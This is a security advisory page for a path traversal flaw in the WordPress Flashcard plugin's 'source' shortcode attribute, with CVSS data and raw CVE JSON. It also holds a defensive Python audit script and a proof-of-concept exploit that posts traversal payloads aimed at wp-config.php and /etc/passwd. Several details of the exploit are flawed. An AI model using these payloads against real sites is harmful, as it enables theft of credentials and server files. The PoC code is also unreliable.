Security Vulnerability Report
CVE-2025-14867 CVSS 6.5 MEDIUM

CVE-2025-14867

Published: 2026-01-07 12:16:57
Last Modified: 2026-04-15 00:35:42

Description

The Flashcard plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 0.9 via the 'source' attribute of the 'flashcard' shortcode. This makes it possible for authenticated attackers, with contributor level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
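
A defender-side audit for the issue described above, as an added example that is not part of the original advisory or the plugin's code: it scans stored post content for `flashcard` shortcodes whose `source` value contains a parent-directory segment or an absolute path. The sample rows are constructed, and treating such values as never legitimate is an assumption about how the plugin is normally used.

```python
import re
from urllib.parse import unquote

# Matches [flashcard ...] shortcodes and captures the attribute string.
SHORTCODE_RE = re.compile(r"\[flashcard\b([^\]]*)\]", re.IGNORECASE)
# Matches source="...", source='...' or an unquoted source=value.
SOURCE_RE = re.compile(r"""\bsource\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))""", re.IGNORECASE)

def extract_sources(content):
    """Return every 'source' attribute value used by a flashcard shortcode."""
    sources = []
    for attrs in SHORTCODE_RE.findall(content):
        for dq, sq, bare in SOURCE_RE.findall(attrs):
            sources.append(dq or sq or bare)
    return sources

def classify(source):
    """Return a reason if the value can escape the intended directory, else None."""
    decoded = source
    for _ in range(3):  # undo nested percent-encoding such as %252e%252e
        decoded = unquote(decoded)
    path = decoded.replace("\\", "/")
    if ".." in path.split("/"):
        return "parent-directory segment"
    if path.startswith("/") or re.match(r"^[A-Za-z]:/", path):
        return "absolute path"
    return None

def audit_posts(posts):
    """posts: iterable of (post_id, author_id, post_content) rows."""
    findings = []
    for post_id, author_id, content in posts:
        for source in extract_sources(content):
            reason = classify(source)
            if reason:
                findings.append((post_id, author_id, source, reason))
    return findings

# Constructed rows, shaped like SELECT ID, post_author, post_content FROM wp_posts
SAMPLE_POSTS = [
    (101, 3, 'Intro [flashcard source="decks/biology.txt"] outro'),
    (102, 7, '[flashcard source="../../../../wp-config.php"]'),
    (103, 7, "[flashcard source='..%2f..%2fwp-config.php' title=x]"),
    (104, 9, "[flashcard source=/etc/passwd]"),
    (105, 2, "No shortcode here, just ../ in text"),
]

if __name__ == "__main__":
    print(*audit_posts(SAMPLE_POSTS), sep="\n")
```

Drafts and revisions are worth including in the rows fed to `audit_posts`, since the vulnerable attribute can sit in content that was never published.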

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Flashcard Plugin for WordPress <= 0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-14867 Path Traversal PoC for WordPress Flashcard Plugin
# Authenticated Contributor+ Required
import requests
import sys
from urllib.parse import quote

target_url = "http://target-wordpress-site.com"
username = "attacker"
password = "attacker_password"

# Login to WordPress
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In"
}
session.post(login_url, data=login_data)

# Create post with malicious shortcode
post_url = f"{target_url}/wp-admin/post-new.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}

# Path traversal to read wp-config.php
shortcode = '[flashcard source="../../../../wp-config.php"]'
post_data = {
    "post_title": "CVE-2025-14867 Test",
    "post_content": shortcode,
    "post_status": "draft",
    "publish": "Publish"
}
response = session.post(post_url, data=post_data, headers=headers)

# Alternative: Direct shortcode usage in existing post
# Use XML-RPC API for exploitation
xmlrpc_url = f"{target_url}/xmlrpc.php"
malicious_shortcode = '[flashcard source="../../../../etc/passwd"]'
xmlrpc_data = """<?xml version="1.0"?>
<methodCall>
<methodName>wp.newPost</methodName>
<params>
<param><value><int>1</int></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param><value><struct>
<member><name>post_type</name><value><string>post</string></value></member>
<member><name>post_content</name><value><string>""" + malicious_shortcode + """</string></value></member>
</struct></value></param>
</params>
</methodCall>"""

# Send exploit via XML-RPC
response = session.post(xmlrpc_url, data=xmlrpc_data, headers=headers)
print("Exploit sent. Check the post content for file read results.")
print(f"Response status: {response.status_code}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14867", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:57.177", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Flashcard plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 0.9 via the 'source' attribute of the 'flashcard' shortcode. This makes it possible for authenticated attackers, with contributor level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/flashcard/tags/0.9/flashcard.php?marks=73,109#L73", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fcc6e5-1f90-41e7-8d5a-2bfe8cbf46fa?source=cve", "source": "[email protected]"}]}}